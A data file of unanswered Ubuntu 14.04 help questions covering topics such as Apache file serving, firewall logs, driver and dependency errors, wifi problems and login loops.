517152	i want to enable apache in serving files from esata . ubuntu 14.04 . home server	i am new to apache and linux ( 3 months ) and started a home server , i would like to serve my documents in .pdf and .mp4 video of my own solved maths/physics solution via apache 2 residing on the external hdd to anybody . everything went okay but by clicking the download link of the website page , apache just try to play that file and then if one tries to save the file with right click then only 250 bytes are downloaded with complete filename . the 2 qs are : 1 : i want that the left click will enable the downloading instead of playing . 2 : i want to enable the complete download instead of just 250 bits . i have ubuntu 14.04 and apache2 . the main config . file is apache2.conf in /etc/apache2 folder . if i put the pdf or mp4 file in the folder /var/www/html/ then the complete file is downloaded without problem but the ubuntu 14.04 installation hdd is just 100 gb and i want to use a esata 2tb external hdd for the serving files . the external hdd is mounted on startup . the website is one of the few websites i am running as virtual host . about 250 bytes when opened with gedit shows this message ! doctype html public `` -//ietf//dtd html 2.0//en '' > html > title > 404 not found /head > h1 > not found p > the requested url xyz ( where xyz is the path of the file on external hdd ) was not found on this server . it is strange as when right click and save from the browser , it shows the complete path of the file and it indeed download the filename and the 250 bytes contains the message as above . can someone help me out please ? or even point me to the right direction . the few websites are running from the dir var/www/html without any problem . i just want to enable downloads or you can say uploads . the permission of the external hdd is www-data and the permission of var/www/html/xyz-website.com is also www-data . any help is appreciated and if its off topic then plz point me to the right topic . about the mount point of the external hdd plz see my comment below . so how would i mount the external hdd to the subfolder of the var/www/html ? or how would i make the virtual document root ? any link is very appreciated . thx
517155	ufw behind a router blocks traffic from the outside world	i 'm seeing [ ufw block ] entries in my logs , where src=173.194.67.16 dst=192.168.1.2 . my box is behind a router , dst is my internal ip , src seems to some google server and i do n't understand how is it possible for an external server to connect to my machine sitting behind nat . i suppose i 'm missing something so i need your help to solve that mystery . edit : some more data : $ sudo ufw status verbose status : active logowanie : on ( low ) default : deny ( incoming ) , allow ( outgoing ) nowe profile : skip the router runs dd-wrt , is not accessible from the outside ( port scanners do n't see anything ) , there is no forwarding/passthough/whatever turned on etc . i checked more of those blocked ips and they seem to be ips of websites i browse ( google , hosting provider , github etc . ) so i suspect it might have something to do with chrome . but i still do n't understand why ufw logs blocked connections from the outside ...
517156	regional language not working on google chrome only	i had installed malayalam language keyboard ( from keyboard layout settings in systemsettings ) in ubuntu on my dell laptop . and i can type malayalm language in any window or application except google chrome . so i cant search a word in malayalam directly.. is there any settings to change.. please help
517157	how to exclude files in torrent from download ?	is it possible to exclude certain files within a torrent from downloading using the transmission client ? i ca n't seem to be able to find any such option . if i go to properties â files , there are no options whatsoever . i used to use this feature regularly in bittorrent on windows .
517159	how to : record adobe flash video ( be-at.tv )	problem : i do n't know how to download this video that is being broadcasted by be-at.tv here : http : //www.be-at.tv/brands/cavo-paradiso/r3hab/r3hab . what i need find the url of the video . download that video from the url . thank you for your help !
517169	efi installation fail	edit : i managed to resolve part of the problem myself . now i am left with this . i have a toshiba satellite nb10t-a-101 with pre-installed windows 8 . i did had ubuntu installed before , but after a system failuere i decided to re-install . i delated the linux partitions ( i had a separate partition for /boot , / , and swap ) , and try to install ubuntu again , and this is the error i am getting after setting the partitions : '' the attempt to mount file system with type vfat in scsi1 ( 0,0,0 ) , partition # 1 ( sda ) at /boot/efi failed . you may resume partitioning from the partitioning menu . '' there is no partitioning combination that worked and continuing also does n't change anything ( the installation starts and hangs ) . the possible cause might be the replaced original efi ( bootx64.efi ) with the `` gummiboot '' . i did it to allow a double boot in the first place and copying gumiboot was suggested to me as a solution ( boot-repair fails ( uefi and pre-installed windows 8 ) ) . i have a backup of the poriginal efi file ( bootx64.efi ) , but as i erased the previous boot partition i do n't know where to copy it in order to restore the original efi . my partitions : 1 430mb ( ntfs , efi- unable to mount in any way ) 2 600mb ( ext4 , this is where i had , and want to have , the boot partition again ) 3 230 mb ( fat32 , efi- yep , there are 2 efi partitions , i do n't know why , the pc came like this ) 4 230 gb ( ntfs , windows 8 ) 5 40gb ( ext4 destination for / ) 6 4gb ( swap ) 7 185 gb ( ext4 , /home ) 8 10gb ( ntfs , windows recovery ) [ i know , it 's messy , but i do n't want to erase windows and therewith loose my warranty ] also , during the installation partitioning it shows as if there is 1mb of free space before the first partition ( gpart nor the windows partitioning does not see this 1mb ) . any ideas ? would formatting the efi partition be a good idea ? or i should do something else . i am worried of being stuck with no boot at all . p.s . i have tried with ubuntu , ubuntu studio and mint- the problem repeats each time . i can continue the installation but it hangs and than turns off due to inactivity .
517173	old version of newly installed skype opens instead of new one - not in terminal , but with quick access	i have installed the new skype version ( 4.3 ) on ubuntu . thanks to this thread how to upgrade skype from 4.2 to 4.3 i managed to do it with little proficiency , thank you so much ! and i have also followed the advice cd ~ & & rm -r .skype since the old version kept opening instead of the new one here as well , and when i now type the command `` skype '' in a terminal , the new version comes , fine . however , when i use the alt+f2 and type directly `` skype '' , the old broken version comes . when after that going back to the terminal , the command skype gives now the old version again . when agian removing the skype folder with the command above , the new version comes and i need to agree on the conditions again etc . how can i fix this ? i would have preferred to add this question to the original thread but i am new here and seem not to be allowed to do this . thank you very much in advance , sabine
517177	unable to create file using wine	i had mounted a samba share , and i tried to run a windows application which should create some files , but it failed , therefore i used cmd with wine to create a directory , but i received the following error . i also typed ulimit -c unlimited and restarted the pc but this did n't work . microsoft windows 5.1.2600 ( 1.7.22 ) z : \media\simulations\ > mkdir alma wineserver crashed , please enable coredumps ( ulimit -c unlimited ) and restart . without wine i can create and modify the files without any problem .
517178	dowloaded file not showing in the downloaded directory ( in flareget download manager )	i downloaded an .iso file ( size : 1.4gb ) using flareget download manager . after downloading it does n't show up . it is not found in the downloaded directory . it shows a cross in the download list in flareget . the location is home/user/downloads/compressed but the compressed folder is not present , not even hidden . anyone please help me .
517179	apt-file equivalent to search for source files	i find the apt-file utility very comfortable to find the package that delivers a given file . if i wanted to find the package that delivered /bin/bash i would simply type apt-file find /bin/bash and get a list of packages that contain that file . now i wonder can i somehow search for source files of packages ? for example if i wanted to find all packages whose source structure contains lib/glob/glob.h ? ( it is bash in this case ) .
517181	database for .net development in mono	i 'm bit new to linux . and want to develop .net apps with mono . actually its for my college project . in windows we use ms sql with ms visual studio , but problem is i cant find the perfect database replacement for ms sql server which can i use with mono . any suggestion will be helpful .
517183	how to setup a multi user nas	i want to setup a multi-user nas , with an administrator , and have that admin have the ability to add users to the nas . users are likely to be using mainstream platforms . so i plan for them to use things such as winscp , cyberduck etc . i want the administrator to be able to add/ remove , append , etc , within the confines of his user directory , and to be able to add users with permissions to files and folders within his user directory . in my current ssh_config file , i limit users who can login . i would like to maintain a strict control of users who can login to my system , but i am not sure how to do that , if i have a group of changing users in some group . can i set up a group access in the ssh_config file ? i know this must involve group permissions , and user permissions , but i am not sure how to set it up . what i have is an open-ssh server . what i do n't want is to use samba . ( i think this can be done with ssh/sftp alone ) yes , i see this thread : how to set up ubuntu server as a nas ? no , this is not a duplicate .
517188	trying to install wine on 14.04 , have tried removing all wine related but still no joy	after alot of dependency problems decided to remove all wine related packages from synaptic . recently upgraded from 12.04 to 14.04 . do not understand what is happening . get depends wine1.6-i386 , when i try to install that get cmslib2-2 dependencies $ sudo apt-get install wine winetricks reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed e : unable to correct problems , you have held broken packages . 2014-08-28_15:28 ~ $
517189	peripherals switch off , caused by overheating : acpi problem	i have an hp pavilion dm1-4125sa laptop , 64 bit with 1.7 ghz amd dual-core e-450 cpu , dual-booted with windows 7 and ubuntu 14.04 . often when i am in ubuntu ( only ubuntu , windows is fine ) , when it overheats ( to about 60-70째c ) after 20-30 mins of general use , the keypad and touchpad just switch off . although i can continue to use it with external peripherals , this is very annoying . i am pretty sure this is caused by acpi , as i have no acpi-based fan control . i know this as the following file is non-existent /proc/acpi/fan i have tried booting with : acpi=off as a boot parameter , but it does n't solve it . does my bios ( updated very recently ) not have any fan control , or can i get ubuntu to be able to control it ? otherwise is there another solution i am willing to perform any commands for further diagnosis .
517192	monitor network traffic usage per user by terminal ?	can you offer me some tools with which i can monitor traffic usage per user in wifi/ethernet network per user ? and also will be good if i can see pc 's name .
517195	ubuntu 14.04 - network problems ( wireless and dns )	i have seen a very similar problem on post : can not resolve dns on 12.10 install but with no clear answer and my problem is related to ubuntu 14.04 , another particularity is that this problem started without any configuration change made by me . also , i can connect from any other device to my computer through ssh or samba but i can not ping or do anything from the ubuntu to my other devices ( win7 ) here goes some information route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet8 192.168.180.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet1 /etc/resolv.conf '' # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) '' # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search spo.virtua.com.br as per my version of ubuntu i understand that resolv.conf is auto configured by resolvconf and i created /etc/resolvconf.conf to try to force some extra configuration /etc/resolvconf.conf nameserver 8.8.8.8 nameserver 192.168.0.1 nameserver 127.0.0.1 nameserver 127.0.1.1 search spo.virtua.com.br dig google.com ; > dig 9.9.5-3-ubuntu > google.com ; ; global options : +cmd ; ; connection timed out ; no servers could be reached pinging 8.8.8.8 ( google ) ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 17 packets transmitted , 0 received , 100 % packet loss , time 16126ms pinging my router ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.0.1 ping statistics -- - 9 packets transmitted , 0 received , 100 % packet loss , time 8063ms traceroute my router traceroute : unknown host 192.168.0.1 does anyone know what can i do to fix it ?
517196	installing fog on ubuntu 12.04	i am trying to install fog on 12.04 server lts . i have downloaded the latest version from sf , but when i try to install it , it fails when trying to install mysql , specifically with : the following packages have unmet dependencies . mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried to manually apt-get mysql-server-5.5 , but that fails , citing the following dependencies : depends : mysql-client-5.5 ( > =5.5.38-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libdbi-perl but it is not going to be installed depends : mysql-server-core-5.5 ( > =5.5.38-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libhtml-template-perl but it is not going to be installed long story short , is this just a big incompatibility with 12.04 and the newest mysql builds or something more fundamental ? i 'm guessing in the former case , it 's possible to alter the fog install script to grab an older version , but i do n't have a clue where to start with that . i 'm on 12.04 because that is the last lts release suggested for fog ( they warn against 14.04 here ) . i 've checked all my sources and they 're the correct ones for precise pangolin . all help appreciated .
517200	unable to install ubuntu-sdk	qtcreator-plugin-ubuntu : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqt5core5a ( > = 5.2.0 ) but 5.2.1+dfsg-1ubuntu14.2 is to be installed depends : libqt5gui5-gles ( > = 5.0.2 ) but it is not going to be installed depends : libqt5qml5 ( > = 5.0.2 ) but 5.2.1-3ubuntu15.1 is to be installed depends : libqt5quick5-gles ( > = 5.0.2 ) but it is not going to be installed depends : libqt5script5 ( > = 5.0.2 ) but 5.2.1+dfsg-1ubuntu1 is to be installed depends : libqt5scripttools5 ( > = 5.0.2 ) but 5.2.1+dfsg-1ubuntu1 is to be installed depends : libqt5widgets5 ( > = 5.2.0 ) but 5.2.1+dfsg-1ubuntu14.2 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed depends : libudev1 ( > = 183 ) but 204-5ubuntu20.3 is to be installed
517204	how do i get brightness control working on an hp 655 ?	please i installed ubuntu 14.04.1 on my hp 655 alongside windows 8.1 but my brightness control does n't work although it does work on my windows platform .
517205	change terminal or terminator profile via keybinding or echo command	how can i change profile for terminator or terminal without touching the mouse ? in terminal alt-t will allow me to get to menu to change profile echo -en `` \033 ] 0 ; $ *\a '' will allow me to set title from terminal i 'd like to have aliases called `` red '' , `` green '' etc that allow me to easily change terminal profile so i can more easily distinguish between the many terminals on which i 'm doing work . does anyone know how to change profile via an echo or keybinding . it does n't look like it is supported . thanks
517208	hardware issue for dell d820 -- `` cloudy '' screen crash	my dell latitude d820 has what i think is a hardware issue , where the whole computer stalls ( e.g . music that was playing begins to loop ) and the laptop monitor becomes `` cloudy '' see this photo . cloudiness begins at the edges of the screen then fills towards the centre . some text can still be read . i could do nothing but a hard restart . this has happened 3 times in the past 2 months . i 've had the dell battery in for some of them so i suspect it 's not due to a power surge . when it happens i 've not been running anything particularly intensive , nor did i physically jar the computer . i 've been running xubuntu 14.04 since before this began . i do n't know whether it would happen on other operating systems . has anyone seen anything like this before ?
517209	how to configure built-in audio to use multimedia keys in kubuntu ?	i want to use multimedia keys to increase or decrease volume or mute . they can change the volume of cedar hdmi audio , but that does n't change the actual volume . i can change it via built-in audio so i thought if i make cedar hdmi audio the prefered card , sound will be changed with multimedia keys . but unfortunately that does n't work ! please help me if you know anything about this .
517210	ca n't login after failed upgrade to 14.04	i ran an upgrade from 12.04 to 14.04 and while upgrading the power went off . i used this post : ubuntu 13.04 to 13.10 : filesystem check or mount failed . now i can get to the login page , but when i enter my pw , it just brings me back to the login page . i ca n't login as guest either . when i hit ctrl+alt+f1 it asks for my login and pw and here it says i have an incorrect login . i only have very basic knowledge of ubuntu , so could someone help me out and walk me through a fix . thanks !
517211	how to prepare ubuntu 12.04 lts to upgrade 14.04	i want to upgrade my ubuntu 12.04 to 14.04 but i always fear losing my data . i never upgrade an linux`s distro before , actually , this is about one year i am using it . so i do n't know how actually this really works , when upgrading , but i want to keep my pictures , musics , documents and so on that are in my home folder . i launched gparted and my partitions are : 1- /dev/sda1 file system : ext4 mount point : / size : 690.78 gib used : 176.25 gib flags : boot 2- /dev/sda2 ~ ~ : extended mount point : < nothing here > size : 7.86 gib used : - flags : - and inside /dev/sda2 there is an linux-swap with same size above . my question is , how can i upgrade my 12.04 without losing my home files . i considered to create a partition to store it but i am not so sure . also , after upgrading it , there is some way to re-install my old programs that were left in the old system ? i mean , via ubuntu software center ? thanks in advance
517212	booting android with grub , but how ?	i have a small problem . i have seven partitions : device boot begin end blocks id system /dev/sda1 * 206848 219013119 109403136 7 hpfs/ntfs/exfat < -- windows 7 /dev/sda2 219013120 735516671 258251776 7 hpfs/ntfs/exfat < -- musik , ... . /dev/sda3 735516672 815638527 40060928 7 hpfs/ntfs/exfat < -- android /dev/sda4 815640574 976771071 80565249 5 erweiterte < -- no idea : d partition 4 does not start at a physical sector boundary . /dev/sda5 815640576 872494091 28426758 83 linux < -- kali linux /dev/sda6 970151936 976771071 3309568 82 linux swap / solaris /dev/sda7 872495104 970149887 48827392 83 linux < -- ubuntu i found a tutorial , but i tried this and it does n't work . here 's the link : http : //www.webupd8.org/2012/03/how-to-dual-boot-android-x86-and-ubuntu.html i used this android from android-x86.org and the version android-x86-4.4-r1.iso . this is my 40_costum document : # ! /bin/sh exec tail -n +3 $ 0 # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry `` android-x86 '' { set root= ' ( hd0,3 ) ' linux /android-x86-4.4-r1/kernel quiet root=/dev/ram0 androidboot_hardware=eeepc acpi_sleep=s3_bios , s3_mode src=/android-x86-4.4-r1 initrd /android-x86-4.4-r1/initrd.img } if i start my pc the grub bootmanager comes and i can chose android , but it does n't boot android . the background is purple and nothing happens : / what would be a complete and working 40_costum script ? i failed it dont work if i make a skript in grub costumizer and save it it dont shows on the boot menu if i open the grub costumizer again the skript is deleted . this is my code : set root= ' ( hd0,3 ) ' `search -- no-floppy -- fs-uuid -- set=root 28d9fdf951298246 linux android-x86/kernel root=uuid=28d9fdf951298246 quiet androidboot.hardware=generic_x86 src=/android-x86 acpi_sleep=s3_bios , s3_mode initrd android-x86/android-4.4-r1/initrd.img iam very frustrated because i tried every thing : ( now i have one extra problem : if i start my laptop it schows ubuntu , windows , kali linux and a android ( dont work ) , but if i start the grub costumizer the windows isnt listed ? ! ? ! but why ?
517214	ubuntu 14.04 wifi problems with n-6235	i am complete noob with ubuntu so bear with me . i am using ubuntu 14.04 on my samsung series 9 , and have consistent wifi problems being very slow and disconnecting . amd @ amd-satellite-a305d : ~ $ uname -r 3.13.0-34-generic amd @ amd-satellite-a305d : ~ $ lsmod | grep iwlwifi iwlwifi 169932 1 iwldvm cfg80211 484040 3 iwlwifi , mac80211 , iwldvm amd @ amd-satellite-a305d : ~ $ iwconfig wlan2 ieee 802.11abg essid : '' socowireless '' mode : managed frequency:2.462 ghz access point : 00:11:21 : fd:53:00 bit rate=11 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=35/70 signal level=-75 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:17 invalid misc:2986 missed beacon:0 eth4 no wireless extensions . lo no wireless extensions . amd @ amd-satellite-a305d : ~ $ lshw -c network warning : you should run this program as super-user . *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan2 version : 24 serial : c4:85:08:3d:82:59 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-34-generic firmware=18.168.6.1 ip=172.16.2.191 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:48 memory : f0600000-f0601fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth4 version : 06 serial : e8:03:9a : bd:35:8e size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff warning : output may be incomplete or inaccurate , you should run this program as super-user whenever i try to edit the bitrate for wlan2 , it give me this amd @ amd-satellite-a305d : ~ $ iwlist wlan2 bitrate wlan2 unknown bit-rate information . current bit rate:11 mb/s i have tried to disable the 802.11n option using the commmand amd @ amd-satellite-a305d : ~ $ echo options iwlwifi 11n_disable=1 | sudo tee /etc/modprobe.d/51-disable-6235-11n.cong [ sudo ] password for amd : options iwlwifi 11n_disable=1 amd @ amd-satellite-a305d : ~ $ and that did not seem to fix the problem . my network speeds range from 1 to 11mb/s varying constantly . any suggestions ?
517219	quick question about ubuntu on external hdd	i 'm new to ubuntu and after some google search , i manage to install ubuntu on my external drive ( 4 partitions ) with the following setup : sdb1 : ubuntu and grub ( 60gb ) sdb2 : swap ( 7gb ) sdb3 & 4 : file storages so far it is working well for me , i can boot it on my laptop when i want to . question is , will it be able to boot on any other laptops or pcs . if it is , is there any problem that i should be aware of ? i 'm sorry if there is already a similar topic , i could not find anything .
517224	can i create an ubuntu installation in my pendrive but not volatile in order to keep my data in a future boot ?	ubuntu livecd works on volatile ( temporarily ) memory , it 's ram . that 's ok . however i want to really make an installation on my pendrive , in order to keep my data in a future boot . can i install the ubuntu normally on my pendrive ? ! which are the possibilities to do that ? !
517225	ubuntu 14.04 unresponsive after installing nvidia drivers	i followed the second answer of this question to install nvidia drivers on my lenovo z570 . but now , as a result , my ubuntu 14.04 is unresponsive . mouse clicks not working . the login screen looks perfect , but after typing in the password , the screen 's resolution changes to very low and nothing works ... will i have to reinstall ubuntu again ? or if any , what is the procedure to revert back the changes ( uninstall all nvidia drivers ) . any help would be appreciated greatly .
517226	usb ftdi devices work only sometimes on 14.04.1	i hope that you could help me with a really frustrating problem . i use ubuntu server 14.04.1 lts and i have three argolis smargo smartreaders v2 which i use with a program called oscam . when i boot ubuntu and launch oscam , then about 50 % of the times the smartreader is n't working with oscam . when it does n't work - then it does n't work during that `` boot '' ever ( stopping/starting oscam never helps ) until i either reboot ( and get a new 50 % chance of it to work ) or if i run this script i found on another forum ( to kind of reset the usb devices ? ) : for i in $ ( ls /sys/bus/pci/drivers/ehci-pci/|grep : ) do echo $ i > /sys/bus/pci/drivers/ehci-pci/unbind done for i in $ ( ls /sys/bus/pci/drivers/uhci_hcd/|grep : ) do echo $ i > /sys/bus/pci/drivers/uhci_hcd/unbind echo $ i > /sys/bus/pci/drivers/uhci_hcd/bind done when i run that script it 's exactly the same as if i would reboot - i get a new 50 % chance of it to work . when it does work - then it works all the time during that `` boot '' ( i can stop/start oscam 100 times - it works all the time ) until i reboot or run the script . i 've tried this with each of the three different smartreaders , always only with one at a time and in different usb ports . i 've even tried with a usb hub with external power and i always get this result with a 50 % chance of it to work . the manufacturer offers a tool to determine the readers currently connected and the result is like this : looking for smartreader compatible devices ... bus 003 , device 002 : 0403:6001 smartreader2 plus ( type=srv2 , in_ep=02 , out_ep=81 ; insert in oscam.server 'device = srv2 ; serial : card1 ' ) it always look exactly like this , the only thing that sometimes changes is the bus 003 to 004 after a reboot/running my script but there is no relation to when it 's working or not . both bus 003 work and wo n't work ( the same with bus 004 ) . i think the smartreaders have a usb to serial ftdi chip in them ( ? ) . i 've also got a usb keyboard connected which works all the time . thank you !
517229	what does 'ls -al ' do ?	when i entered the -al attribute with the ls command , i got the following : anupam @ jazz : ~/blog $ ls -al total 76 drwxrwxr-x 13 anupam anupam 4096 aug 28 21:45 . drwxr-xr-x 34 anupam anupam 4096 aug 28 20:52 .. drwxrwxr-x 8 anupam anupam 4096 aug 28 12:19 app drwxr-xr-x 2 anupam anupam 4096 aug 28 12:19 bin drwxrwxr-x 5 anupam anupam 4096 aug 28 12:19 config -rw-rw-r -- 1 anupam anupam 154 aug 28 12:19 config.ru drwxrwxr-x 3 anupam anupam 4096 aug 28 12:37 db -rw-rw-r -- 1 anupam anupam 1339 aug 28 12:19 gemfile -rw-rw-r -- 1 anupam anupam 2871 aug 28 12:19 gemfile.lock drwxrwxr-x 7 anupam anupam 4096 aug 28 21:45 .git -rw-rw-r -- 1 anupam anupam 466 aug 28 12:19 .gitignore drwxrwxr-x 4 anupam anupam 4096 aug 28 12:19 lib drwxrwxr-x 2 anupam anupam 4096 aug 28 12:29 log drwxrwxr-x 2 anupam anupam 4096 aug 28 12:19 public -rw-rw-r -- 1 anupam anupam 249 aug 28 12:19 rakefile -rw-rw-r -- 1 anupam anupam 478 aug 28 12:19 readme.rdoc drwxrwxr-x 8 anupam anupam 4096 aug 28 12:19 test drwxrwxr-x 6 anupam anupam 4096 aug 28 12:33 tmp drwxrwxr-x 3 anupam anupam 4096 aug 28 12:19 vendor what does the total 76 signify here ?
517230	video scope not correctly displaying content in mounted drive	i have all of my videos on an external hdd mounted via fstab at boot to ~/videos this works perfectly for everything but the dash . the dash finds videos i have played in the past via the home scope and videos scope . the dash unfortunately does not find any file i have not played or used at all and for a lot of my video files it does not display thumbnails . did i do something wrong with the mount or is there a workaround ? is it possible the dash does not correctly handle hardlinks/mounts ? have a nice day alexander
517234	wireless connection is very slow	i installed kubuntu on my new hp-15 laptop that i just got . initially the wireless connection was working well , but about two days ago i noticed a decline in the speed of the wireless connection . when i ping the router i 'm getting results greater than 500 ms and sometimes i get 1700 ms whereas if i 'm on a wired connection i get 0.4,0.3 and that means it 's as fast as it 's supposed to be . i never experienced the issue when i used kubuntu on my old laptop , so i do n't know what caused this as i did n't change any network settings . even my colleagues in the office who use windows have never complained of this . how can i fix this problem ?
517236	error installing ubuntu-desktop on 14.04	i am trying to install ubuntu-desktop on 14.04 but when i run apt-get install ubuntu-desktop it gives error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : ubuntu-session but it is not going to be installed e : unable to correct problems , you have held broken packages . '' with synaptic , it shows red mark on this package . i tried with apt-get clean as well as apt-get update but no success .
517238	wrong resolutions after nvidia driver	i have some issues with the nvidia driver . when i have installed the ubuntu 14.04 the screen resolution could not detect the mode 1280x1024 . i have created the mode 1280 x 1024 using xrandr . after installing the nvidia driver i am not able to set the resolution to 1280x1024 . wrong resolutions are detected . if i run xrandr : screen 0 : minimum 8 x 8 , current 1152 x 864 , maximum 8192 x 8192 dvi-i-0 connected primary 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 512x384 60.0 400x300 72.2 320x240 60.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) tv-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-2 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 disconnected ( normal left inverted right x axis y axis ) 1280x1024_60 ( 0x26f ) 108.0mhz h : width 1280 start 1344 end 1456 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1280x1024_60.00 ( 0x27a ) 108.9mhz h : width 1280 start 1360 end 1496 total 1712 skew 0 clock 63.6khz v : height 1024 start 1025 end 1028 total 1060 clock 60.0hz 1280x1024_75.00 ( 0x27d ) 138.5mhz h : width 1280 start 1368 end 1504 total 1728 skew 0 clock 80.2khz v : height 1024 start 1025 end 1028 total 1069 clock 75.0hz 1280x1024_59.00 ( 0x27f ) 107.0mhz h : width 1280 start 1360 end 1496 total 1712 skew 0 clock 62.5khz v : height 1024 start 1025 end 1028 total 1059 when i try to add the new mode : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 my connections is not dvi since i am using an adapter to d-sub .
517239	running kde connect in vanilla ubuntu	so i 'm new to ubuntu but not inexperienced with customizing open source software , and i recently learned about an application called kde connect -- http : //larsemil.se/small-howto-on-kde-connect-and-ubuntu/ -- which i would love to install onto my vanilla 14.04lts box ... but i immediately know this wo n't be as simple as a little apt-get install action because i understand there is some difference between kde and gnome ( which i understand is what vanilla is using ) . it seems like , from a little poking around , that it is possible to run kde apps under gnome/unity in vanilla ubuntu , so i 'm cautiously optimistic that i wo n't have to switch to kubuntu just to use this one app ... but when i decided to just give it a shot and install it from the ubuntu software center , it appeared to install without errors but ultimately resulted in no new software showing up anywhere that i could see at a glance . so i went ahead and uninstalled from ubuntu desktop and my android phone ... i suppose i need to either takes some extra steps to allow kde apps to run on my system , or maybe i need to do a custom build of the kde connect source ? has anyone successfully got this app working under gnome/unity without heavy customization ? or would i need to port the code from kde to gnome ? any generic guides out there on how i would modify a kde app to work in gnome ?
517241	dpkg unable to read triggers file - not found	i have an issue while trying to upgrade my system . when i run sudo apt-get update and then upgrade i get following output : do you want to continue [ y/n ] ? y extracting : 100 % preparing ... dpkg : error : unable to read file triggers file `/var/lib/dpkg/triggers/file ' : no such device or address does n't exists i definitely has file and also all permissions for folders are set to 755 . any help would be appreciated . if more info is needed then i 'll provide them . thanks
517243	ubuntu 14.04 system hangs when using firefox ?	my system hangs when i am browsing the internet . i am using firefox 31.0 and ubuntu 14.04 on my pc . no other operating system installed . any ideas ?
517246	cant log in to xubuntu -already tried tty , recovery mode-	i 'm not very experienced with xubuntu or linux in general . when i tried to use my pc this morning it prompts me to a login window which is odd because i set it to login without one , although i enter the password i set it keeps going back to the login screen . i tried tty but it wo n't accept neither the user name nor the password , i also tried to enter in recovery mode ( holding down the shift key ) and it goes straight to the login window again . i can enter as a guest or xfce ( 4.8 ) please be nice and let me know if you need more details . i tried this login loop ubuntu 12.04 but i ca n't access to tty , also wanted to do this but it wo n't access recovery mode http : //www.psychocats.net/ubuntu/resetpassword update 1 : i was able to access to tty ( ctrl-alt-f1 ) to change the password but still ca n't access to my desktop .
517250	anonymous upload broken in vsftpd after upgrade to ubuntu 14.04 lts	i had a fully running vsftpd server in ubuntu 12.04 lts with both local and anonymous being able to upload files . local users were chrooted to their directory , and anonymous user was chrooted to `` /srv/ftp/pub '' which was not writeable by the ftp user . there is a sub-folder named `` incoming '' that is world-writeable . uploads are chowned to a different user , and chmodded to 0222 . since the upgrade to 14.04 lts , anonymous users are still able to log in , but get disconnected immediately upon any upload attempt . normal users still behave as expected . anybody else having an issue with their vsftpd servers since the upgrade ? thanks !
517251	what can i do to help make ubuntu better for imac users ?	when i installed ubuntu on my workplace 's aluminum imac ( 2012 ) , i realized it was far from working . things that were broken included : graphics sound ( through the headphone jack ) input ( the apple magic trackpad ) wifi ttys brightness controls it was shocking . is n't ubuntu supposed to `` just work '' ? with a lot of hunting around and a lot of experimentation , i managed to get some of it working by installing proprietary drivers through a ppa , using an alternative bluetooth manager , blacklisting wifi drivers , editing my alsa configs , and so on . i really think that this process would be a barrier to entry for owners of similar hardware that would like to try ubuntu . how can i contribute to the way ubuntu works out-of-the-box on this machine ? basically i 'd like to write some script , and contribute it to ubuntu , that detects if a user is on an imac 2012 , and if so , runs a series of tasks that gets it working correctly . where do i start for that ? are there machine-specific setup scripts somewhere that run on installation ?
517256	gnome maps broken	i am trying to use gnome maps in ubuntu 14.04 , but it does n't start at all . running in a terminal i still do n't get any output at all . i have tried versions 3.10.2-1 from the default repos and 3.12.2-1 from gnome staging ppa ( have only installed this package ) . so anyone knows how to make gnome maps work ?
